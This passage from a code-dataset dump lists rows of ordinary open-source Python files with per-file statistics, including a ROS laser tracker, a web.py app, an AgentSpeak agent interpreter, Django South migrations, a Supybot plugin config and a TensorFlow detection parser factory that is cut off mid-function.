Dataset schema (one row per source file; ranges and class counts as observed in the dataset viewer):

| field | type | range / classes |
|---|---|---|
| repo_name | string | length 5–92 |
| path | string | length 4–221 |
| copies | string | 19 classes |
| size | string | length 4–6 |
| content | string | length 766–896k |
| license | string | 15 classes |
| hash | int64 | -9,223,277,421,539,062,000 to 9,223,102,107B |
| line_mean | float64 | 6.51–99.9 |
| line_max | int64 | 32–997 |
| alpha_frac | float64 | 0.25–0.96 |
| autogenerated | bool | 1 class |
| ratio | float64 | 1.5–13.6 |
| config_test | bool | 2 classes |
| has_no_keywords | bool | 2 classes |
| few_assignments | bool | 1 class |

Rows follow. Each row is shown as a `repo_name | path | copies | size` line, the file content, then a `license | hash | ...` stats line.
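For orientation, a minimal sketch of loading rows with this schema via the Hugging Face `datasets` library; the dataset id `org/python-code` is a placeholder, not the actual repository name:

```python
# Minimal sketch: load a code dataset with this schema and keep
# human-written, non-test Python files. "org/python-code" is a placeholder id.
from datasets import load_dataset

ds = load_dataset("org/python-code", split="train")

# Filter on the boolean quality flags each row carries.
ds = ds.filter(lambda row: not row["autogenerated"] and not row["config_test"])

for row in ds.select(range(3)):
    print(row["repo_name"], row["path"], row["license"], row["size"])
```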
repo_name: pedrombmachado/summitxl | path: simple_follower/scripts/laserTracker.py | copies: 1 | size: 3097
#!/usr/bin/env python
# test mail: chutter@uos.de
import rospy
import thread, threading
import time
import numpy as np
from sensor_msgs.msg import Joy, LaserScan
from geometry_msgs.msg import Twist, Vector3
from std_msgs.msg import String as StringMsg
from simple_follower.msg import position as PositionMsg
class laserTracker:
    def __init__(self):
        self.lastScan = None
        self.winSize = rospy.get_param('~winSize')
        self.deltaDist = rospy.get_param('~deltaDist')
        self.scanSubscriber = rospy.Subscriber('/hokuyo_base/scan', LaserScan, self.registerScan)
        self.positionPublisher = rospy.Publisher('/object_tracker/current_position', PositionMsg, queue_size=3)
        self.infoPublisher = rospy.Publisher('/object_tracker/info', StringMsg, queue_size=3)

    def registerScan(self, scan_data):
        # registers laser scan and publishes position of closest object (or point rather)
        ranges = np.array(scan_data.ranges)
        # sort by distance to check from closer to further away points if they might be something real
        sortedIndices = np.argsort(ranges)
        minDistanceID = None
        minDistance = float('inf')
        if not (self.lastScan is None):
            # if we already have a last scan to compare to:
            for i in sortedIndices:
                # check all distance measurements starting from the closest one
                tempMinDistance = ranges[i]
                # now we check if this might be noise:
                # get a window. in it we will check if there has been a scan with similar distance
                # in the last scan within that window
                # we need to clip the window so we don't have an index out of bounds
                windowIndex = np.clip([i - self.winSize, i + self.winSize + 1], 0, len(self.lastScan))
                window = self.lastScan[windowIndex[0]:windowIndex[1]]
                with np.errstate(invalid='ignore'):
                    # check if any of the scans in the window (in the last scan) has a distance close enough to the current one
                    if np.any(abs(window - tempMinDistance) <= self.deltaDist):
                        # this will also be false for all tempMinDistance = NaN or inf
                        # we found a plausible distance
                        minDistanceID = i
                        minDistance = ranges[minDistanceID]
                        break  # at least one point was equally close,
                        # so we found a valid minimum and can stop the loop
        self.lastScan = ranges
        # catches no scan, no minimum found, minimum is actually inf
        if minDistance > scan_data.range_max:
            # means we did not really find a plausible object
            # publish warning that we did not find anything
            rospy.logwarn('laser no object found')
            self.infoPublisher.publish(StringMsg('laser:nothing found'))
        else:
            # calculate angle of the objects location. 0 is straight ahead
            minDistanceAngle = scan_data.angle_min + minDistanceID * scan_data.angle_increment
            # here we only have an x angle, so the y is set arbitrarily
            self.positionPublisher.publish(PositionMsg(minDistanceAngle, 42, minDistance))


if __name__ == '__main__':
    print('starting')
    rospy.init_node('laser_tracker')
    tracker = laserTracker()
    print('seems to do something')
    try:
        rospy.spin()
    except rospy.ROSInterruptException:
        print('exception')
license: gpl-3.0 | hash: 31,351,464,826,698,900 | line_mean: 35.435294 | line_max: 112 | alpha_frac: 0.723926 | autogenerated: false | ratio: 3.47587 | config_test: false | has_no_keywords: false | few_assignments: false
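A note on the sample above: its noise filter accepts a candidate minimum only if the previous scan saw a similar range within a small index window. A ROS-free sketch of that check, assuming plain NumPy arrays for the two scans (`plausible_minimum` is a name invented here, not part of the original file):

```python
import numpy as np

def plausible_minimum(ranges, last_scan, win_size=2, delta_dist=0.2):
    """Return (index, distance) of the closest plausible point, or None.

    A point is plausible if the previous scan has a similar range within
    +/- win_size indices. NaN/inf candidates never match and are skipped.
    """
    for i in np.argsort(ranges):
        lo, hi = np.clip([i - win_size, i + win_size + 1], 0, len(last_scan))
        window = last_scan[lo:hi]
        with np.errstate(invalid='ignore'):
            if np.any(np.abs(window - ranges[i]) <= delta_dist):
                return i, ranges[i]
    return None
```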
repo_name: jmanday/Informatica | path: DAI/Practicas/resolucionPracticas_1_2/sesion02/ej_04.py | copies: 1 | size: 1510
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Lab exercises for Development of Internet Applications (DAI)
# Copyright (C) 2013 - Zerjillo (zerjioi@ugr.es)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from moon import *
from sun import *
from formulario import *
import web
urls = (
    '/sun(.*)', 'Sun',    # Everything starting with "sun" is handled by the Sun class
    '/moon(.*)', 'Moon',  # Everything starting with "moon" (or the main page) is handled by the Moon class
    '/()', 'Moon',
    '/formulario', 'Formulario',
)

app = web.application(urls, globals())

# Handle the 404 (not found) error
def notfound():
    return web.notfound("Lo siento, la página que buscas no existe. Prueba con /formulario")

# Assign the web application's not-found handler to the function above
app.notfound = notfound

if __name__ == "__main__":
    app.run()
license: gpl-3.0 | hash: -1,203,772,582,571,132,200 | line_mean: 32.466667 | line_max: 116 | alpha_frac: 0.689701 | autogenerated: false | ratio: 3.329646 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: andrellsantos/agentspeak-py | path: agentspeak-py/agent.py | copies: 1 | size: 13361
#!/usr/bin/python
# -*- coding: utf-8 -*-
import random
import copy
from agentspeak import *
class Agent:
    def __init__(self, name, belief_base, initial_goals, plan_library):
        self.name = name
        self.__belief_base = belief_base
        # Plan library P
        self.__plan_library = plan_library
        # Event set E
        self.__events = []
        # Add the initial goals to the event set E
        for initial_goal in initial_goals:
            triggering_event = TriggeringEvent('+', initial_goal)
            event = Event(triggering_event, TRUE_INTENTION)
            self.__events.append(event)
        self.__messages = []
        self.__intentions = []

    def run(self, perceptions=[], messages={}):
        # Message-checking function
        self.__check_messages(messages)
        # Belief revision function (BRF)
        self.__belief_revision_function(perceptions)
        # If there is nothing in the event set and nothing in the intention set
        if not self.__events and not self.__intentions:
            return None
        relevant_plans = []
        while len(self.__events) > 0 and len(relevant_plans) == 0:
            # Event selection function
            event = self._event_selection()
            # Unification function for selecting the relevant plans
            relevant_plans = self.__unify_event(event)
        if relevant_plans:
            # Substitution function for selecting the applicable plans
            applicable_plans = self.__unify_context(relevant_plans)
            if applicable_plans:
                # Intended-means selection function
                intended_mean = self._intended_means_selection(applicable_plans)
                # Intention-set update function
                self.__update_intentions(intended_mean)
        # Selection function for the intention to be executed
        intention = self._intention_selection()
        # The .print(belief_base) function
        if intention and isinstance(intention, Action):
            if isinstance(intention.literal, Print) and not intention.literal.content:
                intention.literal.content = str(self.__belief_base)
        # Return the intention to be executed in the environment
        return intention

    # Message-checking function
    def __check_messages(self, messages):
        self.__messages.extend(messages.pop(self.name, []))
        # Process the received messages
        # [TO-DO] Suppose I have several messages for one agent... do I process
        # them all in the same interpretation cycle?
        for message in self.__messages:
            self.__process_messages(message.sender, message.type, message.literal)
        # Clear the agent's message box
        self.__messages = []

    def __process_messages(self, sender, type, literal):
        # Tell
        # The sending agent intends the receiving agent to hold a belief in which
        # the message literal is true.
        if type == 'tell':
            self.__belief_base.add(literal)
        # Untell
        # The sending agent intends the receiving agent not to hold a belief in which
        # the message literal is true.
        elif type == 'untell':
            self.__belief_base.remove(literal)
        # Achieve
        # The sending agent asks the receiving agent to try to reach a state
        # in which the content of the message literal is true, i.e. it delegates
        # a goal to the receiving agent.
        elif type == 'achieve':
            goal = Goal('!' + literal)
            triggering_event = TriggeringEvent('+', goal)
            event = Event(triggering_event, TRUE_INTENTION)
            self.__events.append(event)
        # Unachieve
        # The sending agent asks the receiving agent to drop the goal of reaching
        # a state in which the content of the message literal is true.
        elif type == 'unachieve':
            goal = Goal('!' + literal)
            triggering_event = TriggeringEvent('-', goal)
            event = Event(triggering_event, TRUE_INTENTION)
            self.__events.append(event)
        # AskOne
        elif type == 'askOne':
            raise NotImplementedError("The 'askOne' type of the .send() function is not implemented yet!")
        # AskAll
        elif type == 'askAll':
            raise NotImplementedError("The 'askAll' type of the .send() function is not implemented yet!")
        # TellHow
        elif type == 'tellHow':
            raise NotImplementedError("The 'tellHow' type of the .send() function is not implemented yet!")
        # UntellHow
        elif type == 'untellHow':
            raise NotImplementedError("The 'untellHow' type of the .send() function is not implemented yet!")
        # AskHow
        elif type == 'askHow':
            raise NotImplementedError("The 'askHow' type of the .send() function is not implemented yet!")
        else:
            raise ValueError('Incorrect type for the .send() function!')

    # [TO-DO] To do (page 118)
    # Belief revision function (BRF)
    def __belief_revision_function(self, perceptions):
        # Receives the information coming from the environment and checks it against the belief set.
        # If the environment perceptions differ, the belief set is updated to
        # reflect the new state of the environment.
        # Each modified belief generates a new event, which is added to the event set.
        # Each literal in the perceptions that is not in the knowledge base is added to the event set
        remove_list = []
        for perception in perceptions:
            if perception not in self.__belief_base.items:
                remove_list.append(perception)
        for item in remove_list:
            triggering_event = self.__belief_base.add(item)
            event = Event(triggering_event, TRUE_INTENTION)
            self.__events.append(event)
        # Each literal in the knowledge base that is not in the perceptions is removed from the event set
        remove_list = []
        for belief in self.__belief_base.items:
            if belief not in perceptions:
                remove_list.append(belief)
        for item in remove_list:
            triggering_event = self.__belief_base.remove(item)
            event = Event(triggering_event, TRUE_INTENTION)
            self.__events.append(event)

    # Event selection function
    def _event_selection(self):
        # Chooses a single event from the event set
        event = None
        if self.__events:
            event = self.__events.pop(0)
        return event

    # Unification function for selecting the relevant plans
    def __unify_event(self, event):
        # Finds the relevant plans by unifying the triggering events with the heads in the plan library
        relevant_plans = []
        theta = {}
        for plan in self.__plan_library:
            unification = unify(event.triggering_event.literal, plan.triggering_event.literal, theta)
            if unification != None:
                plan = self.__substitute_unifier(unification, plan)
                relevant_plans.append(plan)
        return relevant_plans

    # Substitution function for the unification of a plan
    def __substitute_unifier(self, unification, plan):
        if len(unification) > 0:
            # Create a copy of the plan
            plan = copy.deepcopy(plan)
            # Substitute into the triggering event
            plan.triggering_event = substitute(unification, plan.triggering_event.literal)
            # Substitute into the context
            plan_context = []
            for context in plan.context:
                plan_context.append(substitute(unification, context))
            plan.context = plan_context
            # Substitute into the body
            plan_body = []
            for body in plan.body:
                if isinstance(body, Literal):
                    body = substitute(unification, body)
                elif isinstance(body, Goal):
                    body.content = substitute(unification, body.content)
                    body.literal = substitute(unification, body.literal)
                plan_body.append(body)
            plan.body = plan_body
        return plan

    # Substitution function for selecting the applicable plans
    def __unify_context(self, relevant_plans):
        applicable_plans = []
        for plan in relevant_plans:
            if self.__relevant_unifier(plan.context):
                applicable_plans.append(plan)
        return applicable_plans

    def __unify_with_belief_base(self, content):
        theta = {}
        for belief in self.__belief_base.items:
            if unify(content, belief, theta) != None:
                return True
        return False

    def __relevant_unifier(self, context=[]):
        if not context:
            return False
        if len(context) == 1:
            context = context[0]
            if context.functor == 'true':
                return True
            if context.functor == 'not':
                context = context.args[0]
                ret = self.__unify_with_belief_base(context)
                return not ret
            relevant_unifier = self.__unify_with_belief_base(context)
            return relevant_unifier
        else:
            relevant_unifier = self.__relevant_unifier(context[:1]) and self.__relevant_unifier(context[1:])
            return relevant_unifier

    # Intended-means selection function
    def _intended_means_selection(self, applicable_plans):
        # Chooses a single applicable plan from the set of applicable plans
        applicable_plan = None
        if applicable_plans:
            applicable_plan = applicable_plans.pop(0)
            # applicable_plan = random.choice(applicable_plans)
        return applicable_plan

    def __update_intentions(self, intended_mean):
        if intended_mean:
            intention = copy.deepcopy(intended_mean)
            self.__intentions.append(intention)

    # Selection function for the intention to be executed
    def _intention_selection(self):
        # Chooses a single intention from the intention set
        intention = None
        while not intention:
            if self.__intentions:
                # Definition 13: selects an intention i at the top of
                # the intention set I.
                intention = self.__intentions[-1]
                if intention.body:
                    copy_intention = copy.deepcopy(intention)
                    literal = intention.body.pop(0)
                    if isinstance(literal, Goal):
                        if literal.type == '!':
                            # Definition 13: if the formula in the body of 'i' is an achievement goal,
                            # an event of the form <+!g(t), i> is added to the event set and the
                            # intention that generated the event is considered executed
                            triggering_event = TriggeringEvent('+', copy.deepcopy(literal))
                            event = Event(triggering_event, copy_intention)
                            self.__events.append(event)
                            intention = True
                        elif literal.type == '?':
                            # Definition 14: if the formula in the body of intention 'i' is a test
                            # goal, the belief set is searched for a belief atom that unifies with
                            # the test predicate. If one is found, the goal is removed from the
                            # intention set; otherwise the remaining body literals are not executed.
                            theta = {}
                            has_unification = False
                            for belief in self.__belief_base.items:
                                unification = unify(literal.content, belief, theta)
                                if unification != None:
                                    has_unification = True
                                    break
                            if has_unification:
                                intention = True
                            else:
                                self.__intentions.remove(intention)
                                intention = None
                    else:
                        # Definition 15: if the formula in the body of intention 'i' is an action to
                        # be performed by the agent in the environment, the interpreter updates the
                        # environment state with the requested action and removes the action from
                        # the intention set
                        intention = Action(self.name, literal)
                else:
                    self.__intentions.remove(intention)
                    intention = None
            else:
                break
        return intention
license: gpl-3.0 | hash: 7,225,907,124,630,131,000 | line_mean: 43.016722 | line_max: 112 | alpha_frac: 0.573708 | autogenerated: false | ratio: 3.852459 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: openhealthcare/randomise.me | path: rm/trials/migrations/0020_auto__add_field_report_variable__chg_field_report_score.py | copies: 1 | size: 7439
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding field 'Report.variable'
        db.add_column(u'trials_report', 'variable',
                      self.gf('django.db.models.fields.related.ForeignKey')(default=2, to=orm['trials.Variable']),
                      keep_default=False)

        # Changing field 'Report.score'
        db.alter_column(u'trials_report', 'score', self.gf('django.db.models.fields.IntegerField')(null=True))

    def backwards(self, orm):
        # Deleting field 'Report.variable'
        db.delete_column(u'trials_report', 'variable_id')

        # User chose to not deal with backwards NULL issues for 'Report.score'
        raise RuntimeError("Cannot reverse this migration. 'Report.score' and its values cannot be restored.")

    models = {
        u'trials.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
            'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"})
        },
        u'trials.participant': {
            'Meta': {'object_name': 'Participant'},
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Group']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['userprofiles.RMUser']"})
        },
        u'trials.report': {
            'Meta': {'object_name': 'Report'},
            'date': ('django.db.models.fields.DateField', [], {}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Group']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'score': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"}),
            'variable': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Variable']"})
        },
        u'trials.singleuserallocation': {
            'Meta': {'object_name': 'SingleUserAllocation'},
            'date': ('django.db.models.fields.DateField', [], {}),
            'group': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.SingleUserTrial']"})
        },
        u'trials.singleuserreport': {
            'Meta': {'object_name': 'SingleUserReport'},
            'date': ('django.db.models.fields.DateField', [], {}),
            'group': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'score': ('django.db.models.fields.IntegerField', [], {}),
            'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.SingleUserTrial']"})
        },
        u'trials.singleusertrial': {
            'Meta': {'object_name': 'SingleUserTrial'},
            'finish_date': ('django.db.models.fields.DateField', [], {}),
            'group_a': ('django.db.models.fields.TextField', [], {}),
            'group_b': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['userprofiles.RMUser']"}),
            'question': ('django.db.models.fields.TextField', [], {}),
            'start_date': ('django.db.models.fields.DateField', [], {}),
            'variable': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        u'trials.trial': {
            'Meta': {'object_name': 'Trial'},
            'description': ('django.db.models.fields.TextField', [], {}),
            'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'finish_date': ('django.db.models.fields.DateField', [], {}),
            'group_a': ('django.db.models.fields.TextField', [], {}),
            'group_a_expected': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'group_b': ('django.db.models.fields.TextField', [], {}),
            'group_b_impressed': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'max_participants': ('django.db.models.fields.IntegerField', [], {}),
            'min_participants': ('django.db.models.fields.IntegerField', [], {}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['userprofiles.RMUser']"}),
            'participants': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'question': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'recruiting': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'start_date': ('django.db.models.fields.DateField', [], {}),
            'style': ('django.db.models.fields.CharField', [], {'max_length': '2'})
        },
        u'trials.variable': {
            'Meta': {'object_name': 'Variable'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'style': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"})
        },
        u'userprofiles.rmuser': {
            'Meta': {'object_name': 'RMUser'},
            'account': ('django.db.models.fields.CharField', [], {'default': "'st'", 'max_length': '2'}),
            'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'db_index': 'True'})
        }
    }

    complete_apps = ['trials']
license: agpl-3.0 | hash: -7,017,855,676,726,162,000 | line_mean: 61.521008 | line_max: 137 | alpha_frac: 0.54752 | autogenerated: false | ratio: 3.7195 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: agconti/Ember-Demo | path: ember_demo/users/migrations/0002_set_site_domain_and_name.py | copies: 1 | size: 4352
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.conf import settings
from django.db import models
class Migration(DataMigration):

    def forwards(self, orm):
        """Set site domain and name."""
        Site = orm['sites.Site']
        site = Site.objects.get(id=settings.SITE_ID)
        site.domain = "example.com"
        site.name = "ember_demo"
        site.save()

    def backwards(self, orm):
        """Revert site domain and name to default."""
        Site = orm['sites.Site']
        site = Site.objects.get(id=settings.SITE_ID)
        site.domain = 'example.com'
        site.name = 'example.com'
        site.save()

    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'sites.site': {
            'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'users.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        }
    }

    complete_apps = ['sites', 'users']
    symmetrical = True
license: mit | hash: 6,375,379,218,639,753,000 | line_mean: 58.630137 | line_max: 195 | alpha_frac: 0.554917 | autogenerated: false | ratio: 3.644891 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: kg-bot/SupyBot | path: plugins/MilleBornes/config.py | copies: 1 | size: 2718
###
# Copyright (c) 2010, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
try:
    from supybot.i18n import PluginInternationalization
    from supybot.i18n import internationalizeDocstring
    _ = PluginInternationalization('MilleBornes')
except:
    # These are no-op placeholders that allow the plugin to run on a bot
    # without the i18n plugin
    _ = lambda x: x
    internationalizeDocstring = lambda x: x

def configure(advanced):
    # This will be called by supybot to configure this module. advanced is
    # a bool that specifies whether the user identified himself as an advanced
    # user or not. You should effect your configuration by manipulating the
    # registry as appropriate.
    from supybot.questions import expect, anything, something, yn
    conf.registerPlugin('MilleBornes', True)

MilleBornes = conf.registerPlugin('MilleBornes')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(MilleBornes, 'someConfigVariableName',
#     registry.Boolean(False, _("""Help for someConfigVariableName.""")))

# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
license: gpl-3.0 | hash: 5,178,330,492,657,698,000 | line_mean: 45.067797 | line_max: 79 | alpha_frac: 0.765636 | autogenerated: false | ratio: 4.266876 | config_test: true | has_no_keywords: false | few_assignments: false
repo_name: tombstone/models | path: official/vision/detection/dataloader/factory.py | copies: 1 | size: 4932
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture factory."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from official.vision.detection.dataloader import maskrcnn_parser
from official.vision.detection.dataloader import retinanet_parser
from official.vision.detection.dataloader import shapemask_parser
def parser_generator(params, mode):
    """Generator function for various dataset parser."""
    if params.architecture.parser == 'retinanet_parser':
        anchor_params = params.anchor
        parser_params = params.retinanet_parser
        parser_fn = retinanet_parser.Parser(
            output_size=parser_params.output_size,
            min_level=params.architecture.min_level,
            max_level=params.architecture.max_level,
            num_scales=anchor_params.num_scales,
            aspect_ratios=anchor_params.aspect_ratios,
            anchor_size=anchor_params.anchor_size,
            match_threshold=parser_params.match_threshold,
            unmatched_threshold=parser_params.unmatched_threshold,
            aug_rand_hflip=parser_params.aug_rand_hflip,
            aug_scale_min=parser_params.aug_scale_min,
            aug_scale_max=parser_params.aug_scale_max,
            use_autoaugment=parser_params.use_autoaugment,
            autoaugment_policy_name=parser_params.autoaugment_policy_name,
            skip_crowd_during_training=parser_params.skip_crowd_during_training,
            max_num_instances=parser_params.max_num_instances,
            use_bfloat16=params.architecture.use_bfloat16,
            mode=mode)
    elif params.architecture.parser == 'maskrcnn_parser':
        anchor_params = params.anchor
        parser_params = params.maskrcnn_parser
        parser_fn = maskrcnn_parser.Parser(
            output_size=parser_params.output_size,
            min_level=params.architecture.min_level,
            max_level=params.architecture.max_level,
            num_scales=anchor_params.num_scales,
            aspect_ratios=anchor_params.aspect_ratios,
            anchor_size=anchor_params.anchor_size,
            rpn_match_threshold=parser_params.rpn_match_threshold,
            rpn_unmatched_threshold=parser_params.rpn_unmatched_threshold,
            rpn_batch_size_per_im=parser_params.rpn_batch_size_per_im,
            rpn_fg_fraction=parser_params.rpn_fg_fraction,
            aug_rand_hflip=parser_params.aug_rand_hflip,
            aug_scale_min=parser_params.aug_scale_min,
            aug_scale_max=parser_params.aug_scale_max,
            skip_crowd_during_training=parser_params.skip_crowd_during_training,
            max_num_instances=parser_params.max_num_instances,
            include_mask=params.architecture.include_mask,
            mask_crop_size=parser_params.mask_crop_size,
            use_bfloat16=params.architecture.use_bfloat16,
            mode=mode)
    elif params.architecture.parser == 'shapemask_parser':
        anchor_params = params.anchor
        parser_params = params.shapemask_parser
        parser_fn = shapemask_parser.Parser(
            output_size=parser_params.output_size,
            min_level=params.architecture.min_level,
            max_level=params.architecture.max_level,
            num_scales=anchor_params.num_scales,
            aspect_ratios=anchor_params.aspect_ratios,
            anchor_size=anchor_params.anchor_size,
            use_category=parser_params.use_category,
